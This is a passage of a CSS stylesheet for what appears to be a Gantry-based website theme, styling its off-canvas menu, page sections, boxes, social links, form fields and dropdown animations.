#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active {
  background: #f7f7f7;
}
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover > .g-menu-item-container, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #626262;
}
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #ffffff;
  background: #4f953b;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  color: #ffffff;
  background: rgba(0, 0, 0, 0.3);
  -webkit-transition: background 0.2s, color 0.2s, border-color 0.2s;
  -moz-transition: background 0.2s, color 0.2s, border-color 0.2s;
  transition: background 0.2s, color 0.2s, border-color 0.2s;
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:hover {
  background: rgba(0, 0, 0, 0.5);
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator {
  padding-right: 0.2rem;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator:after {
  content: "";
}
#g-offcanvas #g-mobilemenu-container ul .g-dropdown-column {
  width: 17rem;
}
#g-mobilemenu-container {
  margin: -1.563rem;
}
.g-nav-overlay, .g-menu-overlay {
  background: rgba(0, 0, 0, 0.6);
}
@media print {
  #g-offcanvas {
    background: #fff !important;
    color: #000 !important;
  }
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-page-surround {
  left: 17rem;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-page-surround {
  right: 17rem;
}
.g-offcanvas-open .g-nav-overlay {
  z-index: 1010;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 17rem;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: -17rem;
}
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 0;
}
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: 0;
}
@media (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-offcanvas-open .g-nav-overlay {
    z-index: 1010;
  }
  .g-offcanvas-open .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open .g-offcanvas-left #g-top.uk-active {
    margin-left: 17rem;
  }
  .g-offcanvas-open .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open .g-offcanvas-right #g-top.uk-active {
    margin-left: -17rem;
  }
  .g-offcanvas-closing .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-left #g-top.uk-active {
    margin-left: 0;
  }
  .g-offcanvas-closing .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-right #g-top.uk-active {
    margin-left: 0;
  }
}
#g-header.uk-active, #g-top.uk-active {
  -webkit-transition: margin 0.3s;
  -moz-transition: margin 0.3s;
  transition: margin 0.3s;
}
.g-nav-overlay, .g-menu-overlay {
  -webkit-transition: opacity 0.3s ease-out 0s, z-index 0s;
  -moz-transition: opacity 0.3s ease-out 0s, z-index 0s;
  transition: opacity 0.3s ease-out 0s, z-index 0s;
}
#g-drawer {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-drawer h1, #g-drawer h2, #g-drawer h3, #g-drawer h4, #g-drawer h5, #g-drawer h6, #g-drawer strong {
  color: #282828;
}
@media print {
  #g-drawer {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-top {
  background-color: #ffffff;
  border-bottom: 1px solid #f0f0f0;
  color: #959595;
  z-index: 1003;
  font-size: 0.81rem;
}
#g-top h1, #g-top h2, #g-top h3, #g-top h4, #g-top h5, #g-top h6, #g-top strong {
  color: #282828;
}
#g-top .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
#g-top .g-block:last-child {
  text-align: right;
}
#g-top .g-block:first-child {
  text-align: left;
}
#g-top > .g-container {
  position: relative;
}
#g-top .g-main-nav {
  font-size: 0.81rem;
  font-family: "Lato";
}
#g-top .g-main-nav .g-toplevel > li {
  border-right: 1px solid #f0f0f0;
  margin: 0;
  margin-left: -4px;
}
#g-top .g-main-nav .g-toplevel > li:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
#g-top .g-main-nav .g-toplevel > li:last-child {
  margin-left: -4px;
}
#g-top .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding: 9.125px 15px;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container {
  padding: 9.125px 15px;
  line-height: inherit;
  color: #959595;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #959595;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  border: 1px solid #dddddd;
  background: #f7f7f7;
  margin-left: 5px;
  border-radius: 4px;
  width: 1.5rem;
  text-align: center;
  line-height: 1;
}
#g-top .g-main-nav .g-toplevel > li:hover > .g-menu-item-container {
  color: #4f953b;
}
#g-top .g-main-nav .g-dropdown {
  background: #ffffff;
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
#g-top .g-main-nav .g-dropdown a {
  color: #959595;
  padding: 9px 15px;
}
#g-top .g-main-nav .g-dropdown li {
  border-bottom: 1px solid #dddddd;
}
#g-top .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
#g-top .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #959595;
  font-weight: normal;
}
#g-top .g-main-nav .g-sublevel > li:hover > .g-menu-item-container {
  background: #dddddd;
  color: #626262;
}
#g-top .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
#g-top .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  top: 9px;
}
#g-top .g-social a {
  width: 2.5rem;
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  #g-top .g-social a {
    width: 2rem;
  }
}
#g-top .g-paypaldonate {
  margin: 0;
  text-align: right;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button {
  margin-bottom: -1px;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 0.75rem;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  padding: 0 0.75rem;
}
@media only all and (max-width: 47.99rem) {
  #g-top .size-50 {
    flex-basis: 50%;
  }
}
@media print {
  #g-top {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-header {
  background-color: #ffffff;
  color: #959595;
  position: relative;
  z-index: 2;
  text-align: center;
}
#g-header h1, #g-header h2, #g-header h3, #g-header h4, #g-header h5, #g-header h6, #g-header strong {
  color: #282828;
}
#g-header .g-container {
  position: relative;
}
#g-header .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 3rem;
  margin-bottom: 2.5rem;
}
@media print {
  #g-header {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-breadcrumb {
  padding: 1rem 0;
  background-color: #ffffff;
  background-image: url('../../images/bread.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  color: #959595;
}
#g-breadcrumb h1, #g-breadcrumb h2, #g-breadcrumb h3, #g-breadcrumb h4, #g-breadcrumb h5, #g-breadcrumb h6, #g-breadcrumb strong {
  color: #282828;
}
@media only all and (max-width: 47.99rem) {
  #g-breadcrumb {
    text-align: center;
  }
}
@media print {
  #g-breadcrumb {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-fullwidth {
  padding: 0;
  background-color: #f7f7f7;
  color: #008056;
}
#g-fullwidth > .g-container {
  width: 100%;
  padding: 0;
  margin: 0;
}
#g-fullwidth .g-content {
  padding: 0;
  margin: 0;
}
#g-fullwidth h1, #g-fullwidth h2, #g-fullwidth h3, #g-fullwidth h4, #g-fullwidth h5, #g-fullwidth h6, #g-fullwidth strong {
  color: #282828;
}
@media print {
  #g-fullwidth {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-showcase {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #006142;
}
#g-showcase h1, #g-showcase h2, #g-showcase h3, #g-showcase h4, #g-showcase h5, #g-showcase h6, #g-showcase strong {
  color: #006142;
}
@media print {
  #g-showcase {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-intro {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #2b2b2b;
}
#g-intro h1, #g-intro h2, #g-intro h3, #g-intro h4, #g-intro h5, #g-intro h6, #g-intro strong {
  color: #008056;
}
@media print {
  #g-intro {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-feature {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-feature h1, #g-feature h2, #g-feature h3, #g-feature h4, #g-feature h5, #g-feature h6, #g-feature strong {
  color: #68ad53;
}
@media print {
  #g-feature {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-subfeature {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-subfeature h1, #g-subfeature h2, #g-subfeature h3, #g-subfeature h4, #g-subfeature h5, #g-subfeature h6, #g-subfeature strong {
  color: #68ad53;
}
@media print {
  #g-subfeature {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-utility {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-utility h1, #g-utility h2, #g-utility h3, #g-utility h4, #g-utility h5, #g-utility h6, #g-utility strong {
  color: #282828;
}
@media print {
  #g-utility {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-maintop {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-maintop h1, #g-maintop h2, #g-maintop h3, #g-maintop h4, #g-maintop h5, #g-maintop h6, #g-maintop strong {
  color: #282828;
}
@media print {
  #g-maintop {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-system-messages {
  background-color: #ffffff;
  color: #959595;
}
#g-system-messages h1, #g-system-messages h2, #g-system-messages h3, #g-system-messages h4, #g-system-messages h5, #g-system-messages h6, #g-system-messages strong {
  color: #282828;
}
@media print {
  #g-system-messages {
    background: #fff !important;
    color: #000 !important;
  }
}
#system-message-container #system-message {
  padding: 0;
}
#system-message-container #system-message .alert {
  padding: 25px;
  margin: 4.563rem 1.563rem 0 1.563rem;
}
#system-message-container #system-message .alert .close {
  position: static;
}
#system-message-container #system-message .alert .close:hover {
  text-decoration: none;
}
#system-message-container #system-message .alert p {
  margin: 15px 0 0 0;
}
#g-sidebar {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-sidebar h1, #g-sidebar h2, #g-sidebar h3, #g-sidebar h4, #g-sidebar h5, #g-sidebar h6, #g-sidebar strong {
  color: #282828;
}
#g-sidebar .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-sidebar .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-sidebar .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-sidebar .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #dddddd;
}
#g-sidebar .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  #g-sidebar {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-mainbody {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-mainbody h1, #g-mainbody h2, #g-mainbody h3, #g-mainbody h4, #g-mainbody h5, #g-mainbody h6, #g-mainbody strong {
  color: #282828;
}
@media print {
  #g-mainbody {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-aside {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-aside h1, #g-aside h2, #g-aside h3, #g-aside h4, #g-aside h5, #g-aside h6, #g-aside strong {
  color: #282828;
}
#g-aside .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-aside .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-aside .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-aside .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #dddddd;
}
#g-aside .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  #g-aside {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-mainbottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-mainbottom h1, #g-mainbottom h2, #g-mainbottom h3, #g-mainbottom h4, #g-mainbottom h5, #g-mainbottom h6, #g-mainbottom strong {
  color: #282828;
}
@media print {
  #g-mainbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-extension {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-extension h1, #g-extension h2, #g-extension h3, #g-extension h4, #g-extension h5, #g-extension h6, #g-extension strong {
  color: #282828;
}
@media print {
  #g-extension {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-additional {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-additional h1, #g-additional h2, #g-additional h3, #g-additional h4, #g-additional h5, #g-additional h6, #g-additional strong {
  color: #282828;
}
@media print {
  #g-additional {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-prebottom {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-prebottom h1, #g-prebottom h2, #g-prebottom h3, #g-prebottom h4, #g-prebottom h5, #g-prebottom h6, #g-prebottom strong {
  color: #282828;
}
@media print {
  #g-prebottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-bottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-bottom h1, #g-bottom h2, #g-bottom h3, #g-bottom h4, #g-bottom h5, #g-bottom h6, #g-bottom strong {
  color: #282828;
}
@media print {
  #g-bottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-afterbottom {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-afterbottom h1, #g-afterbottom h2, #g-afterbottom h3, #g-afterbottom h4, #g-afterbottom h5, #g-afterbottom h6, #g-afterbottom strong {
  color: #282828;
}
@media print {
  #g-afterbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-last {
  padding: 3rem 0;
  background-color: #ffffff;
  background-image: url('../../images/doves.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  background-position: right center;
  color: #959595;
}
#g-last h1, #g-last h2, #g-last h3, #g-last h4, #g-last h5, #g-last h6, #g-last strong {
  color: #008056;
}
@media print {
  #g-last {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-footer {
  padding: 3rem 0;
  background-color: #282828;
  background-image: url('../../images/footer.jpg');
  background-repeat: no-repeat;
  background-size: cover;
  background-attachment: scroll;
  color: #6f6f6f;
}
#g-footer h1, #g-footer h2, #g-footer h3, #g-footer h4, #g-footer h5, #g-footer h6, #g-footer strong {
  color: #ffffff;
}
#g-footer a {
  color: #a2a2a2;
}
#g-footer a:hover {
  color: #ffffff;
}
#g-footer .g-title:before, #g-footer .g-title:after {
  display: none;
}
#g-footer .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-footer .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-footer .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-footer .g-features2-particle .g-features2-particle-icon {
  color: #ffffff;
  font-size: 90%;
}
#g-footer .g-social a {
  padding: 0.625rem;
  width: 3rem;
  height: 3rem;
  line-height: 1.5rem;
  color: #959595;
  margin: 0;
  border: none;
  background: rgba(0, 0, 0, 0.2);
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
#g-footer .g-social a:first-child {
  border: none;
}
#g-footer .g-social a:hover {
  color: #4f953b;
  background: #ffffff;
}
@media print {
  #g-footer {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-copyright {
  padding: 10px 0;
  background-color: #ffffff;
  color: #959595;
}
#g-copyright h1, #g-copyright h2, #g-copyright h3, #g-copyright h4, #g-copyright h5, #g-copyright h6, #g-copyright strong {
  color: #959595;
}
#g-copyright a {
  color: #4f953b;
}
#g-copyright a:hover {
  color: #c8c8c8;
}
#g-copyright .g-block {
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  #g-copyright {
    text-align: center;
  }
}
#g-copyright:before {
  left: 50%;
  margin-bottom: -50px;
  content: "";
  position: relative;
  display: block;
  width: 50px;
  height: 50px;
  -webkit-transform: translateX(-50%) rotate(45deg);
  transform: translateX(-50%) rotate(45deg);
  z-index: 10;
}
#g-copyright:before {
  top: -35px;
  background: #ffffff;
}
@media print {
  #g-copyright {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-to-top {
  position: fixed;
  bottom: 0;
  left: 0;
  height: 0;
  width: 0;
}
#g-to-top .style1 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #ffffff;
  border-radius: 3px;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
#g-to-top .style1 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  #g-to-top .style1 #g-totop-button {
    display: none;
  }
}
#g-to-top .style1 #g-totop-button.totopfixed {
  bottom: 28px;
}
#g-to-top .style2 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #ffffff;
  border-radius: 50%;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
#g-to-top .style2 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  #g-to-top .style2 #g-totop-button {
    display: none;
  }
}
#g-to-top .style2 #g-totop-button.totopfixed {
  bottom: 28px;
}
.flush .g-container > .g-grid > .g-block > .g-content {
  margin: 0;
  padding: 0;
}
.text-center .g-title, .title-center .g-title {
  text-align: center;
  margin-bottom: 40px;
}
.text-center .g-title:before, .title-center .g-title:before {
  content: "";
  font-family: "Ionicons";
  font-size: 36px;
  color: #4f953b;
  margin: 0 auto;
  display: block;
}
@media only all and (max-width: 47.99rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    display: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    width: 80px;
  }
}
.text-center .g-title:after, .title-center .g-title:after {
  display: none;
}
.text-center .g-particle-intro .g-title:before, .text-center .g-particle-intro .g-title:after, .title-center .g-particle-intro .g-title:before, .title-center .g-particle-intro .g-title:after {
  display: none;
}
.title-border .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 10px;
}
.title-border .g-title:before, .title-border .g-title:after {
  display: none;
}
.title-border .g-particle-intro .g-title {
  border-bottom: none;
  padding-bottom: 0;
}
.title-clean .g-title:before, .title-clean .g-title:after {
  display: none;
}
[class*="box"].g-block > .g-content {
  margin: 1.5625rem;
}
.box1.moduletable, .box1.widget, .box1.g-outer-box, .box1 > .g-content {
  padding: 25px;
  border: 1px solid #dddddd;
  background: #ffffff;
}
.box1.moduletable .g-title, .box1.widget .g-title, .box1.g-outer-box .g-title, .box1 > .g-content .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 15px;
}
.box1.moduletable .g-title:before, .box1.moduletable .g-title:after, .box1.widget .g-title:before, .box1.widget .g-title:after, .box1.g-outer-box .g-title:before, .box1.g-outer-box .g-title:after, .box1 > .g-content .g-title:before, .box1 > .g-content .g-title:after {
  display: none;
}
.box1.moduletable .g-particle-intro .g-title, .box1.widget .g-particle-intro .g-title, .box1.g-outer-box .g-particle-intro .g-title, .box1 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box1.moduletable .g-particle-intro .g-title-separator, .box1.widget .g-particle-intro .g-title-separator, .box1.g-outer-box .g-particle-intro .g-title-separator, .box1 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box2.moduletable, .box2.widget, .box2.g-outer-box, .box2 > .g-content {
  padding: 25px;
  border: 1px solid #dddddd;
  background: #f1f1f1;
}
.box2.moduletable .g-title, .box2.widget .g-title, .box2.g-outer-box .g-title, .box2 > .g-content .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 15px;
}
.box2.moduletable .g-title:before, .box2.moduletable .g-title:after, .box2.widget .g-title:before, .box2.widget .g-title:after, .box2.g-outer-box .g-title:before, .box2.g-outer-box .g-title:after, .box2 > .g-content .g-title:before, .box2 > .g-content .g-title:after {
  display: none;
}
.box2.moduletable .g-particle-intro .g-title, .box2.widget .g-particle-intro .g-title, .box2.g-outer-box .g-particle-intro .g-title, .box2 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box2.moduletable .g-particle-intro .g-title-separator, .box2.widget .g-particle-intro .g-title-separator, .box2.g-outer-box .g-particle-intro .g-title-separator, .box2 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box3.moduletable, .box3.widget, .box3.g-outer-box, .box3 > .g-content {
  padding: 25px;
  background: #4f953b;
  color: #ffffff;
}
.box3.moduletable .g-title, .box3.widget .g-title, .box3.g-outer-box .g-title, .box3 > .g-content .g-title {
  color: #ffffff !important;
  border-bottom: 1px solid #73bf5d;
  padding-bottom: 15px;
}
.box3.moduletable .g-title:before, .box3.moduletable .g-title:after, .box3.widget .g-title:before, .box3.widget .g-title:after, .box3.g-outer-box .g-title:before, .box3.g-outer-box .g-title:after, .box3 > .g-content .g-title:before, .box3 > .g-content .g-title:after {
  display: none;
}
.box3.moduletable .g-particle-intro .g-title, .box3.widget .g-particle-intro .g-title, .box3.g-outer-box .g-particle-intro .g-title, .box3 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box3.moduletable .g-particle-intro .g-title-separator, .box3.widget .g-particle-intro .g-title-separator, .box3.g-outer-box .g-particle-intro .g-title-separator, .box3 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box3.moduletable .button, .box3.widget .button, .box3.g-outer-box .button, .box3 > .g-content .button {
  background: #282828;
}
.box3.moduletable .button:hover, .box3.widget .button:hover, .box3.g-outer-box .button:hover, .box3 > .g-content .button:hover {
  background: #424242;
}
.box3.moduletable a, .box3.widget a, .box3.g-outer-box a, .box3 > .g-content a {
  color: #dddddd;
}
.box3.moduletable a:hover, .box3.widget a:hover, .box3.g-outer-box a:hover, .box3 > .g-content a:hover {
  color: #d0d0d0;
}
.box4.moduletable, .box4.widget, .box4.g-outer-box, .box4 > .g-content {
  padding: 25px;
  background: #282828;
  color: #ffffff;
}
.box4.moduletable .g-title, .box4.widget .g-title, .box4.g-outer-box .g-title, .box4 > .g-content .g-title {
  color: #ffffff !important;
  border-bottom: 1px solid #424242;
  padding-bottom: 15px;
}
.box4.moduletable .g-title:before, .box4.moduletable .g-title:after, .box4.widget .g-title:before, .box4.widget .g-title:after, .box4.g-outer-box .g-title:before, .box4.g-outer-box .g-title:after, .box4 > .g-content .g-title:before, .box4 > .g-content .g-title:after {
  display: none;
}
.box4.moduletable .g-particle-intro .g-title, .box4.widget .g-particle-intro .g-title, .box4.g-outer-box .g-particle-intro .g-title, .box4 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box4.moduletable .g-particle-intro .g-title-separator, .box4.widget .g-particle-intro .g-title-separator, .box4.g-outer-box .g-particle-intro .g-title-separator, .box4 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box4.moduletable .button:hover, .box4.widget .button:hover, .box4.g-outer-box .button:hover, .box4 > .g-content .button:hover {
  background: #63b84b;
}
.shadow .g-content {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
.shadow2 .g-content {
  box-shadow: 0 0 4px rgba(0, 0, 0, 0.15);
}
.disabled .g-content {
  opacity: 0.4;
}
.square .g-content {
  border-radius: none;
}
.rounded .g-content {
  border-radius: 0;
}
table {
  border: 1px solid #e2e2e2;
}
th {
  background: #eaeaea;
  padding: 0.5rem;
}
td {
  padding: 0.5rem;
  border: 1px solid #e2e2e2;
}
textarea, select[multiple=multiple] {
  background-color: white;
  border: 1px solid #dddddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
textarea:hover, select[multiple=multiple]:hover {
  border-color: #c4c4c4;
}
textarea:focus, select[multiple=multiple]:focus {
  border-color: #4f953b;
}
input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]), textarea {
  background-color: white;
  border: 1px solid #dddddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
input[type="color"]:hover, input[type="date"]:hover, input[type="datetime"]:hover, input[type="datetime-local"]:hover, input[type="email"]:hover, input[type="month"]:hover, input[type="number"]:hover, input[type="password"]:hover, input[type="search"]:hover, input[type="tel"]:hover, input[type="text"]:hover, input[type="time"]:hover, input[type="url"]:hover, input[type="week"]:hover, input:not([type]):hover, textarea:hover {
  border-color: #c4c4c4;
}
input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="password"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="text"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, input:not([type]):focus, textarea:focus {
  border-color: #4f953b;
}
body.outline-_error h1 {
  margin: 30px 0;
  text-align: center;
}
body.outline-_error .g-offcanvas-toggle:not(.offcanvas-toggle-particle) {
  display: none;
}
.g-social a {
  display: inline-block;
  padding: 8px 10px;
  background: none;
  color: #959595;
  font-size: 0.9rem;
  margin-left: -4px;
  border-right: 1px solid #f0f0f0;
}
.g-social a:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
.g-social a:hover {
  color: #4f953b;
}
#g-copyright .g-social a {
  padding: 0 10px;
  color: #959595;
  margin: 0;
  border: none;
}
#g-copyright .g-social a:first-child {
  border: none;
}
#g-copyright .g-social a:hover {
  color: #4f953b;
}
#g-copyright .g-block:last-child .g-social {
  margin-right: -10px;
}
@media only all and (max-width: 47.99rem) {
  #g-copyright .g-block:last-child .g-social {
    margin-right: 0;
  }
}
.g-main-nav .g-standard .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
.g-main-nav .g-standard .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
.g-main-nav .g-standard .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
.g-main-nav .g-standard .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
.g-main-nav .g-fullwidth > .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
.g-main-nav .g-fullwidth > .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
.g-main-nav .g-fullwidth > .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
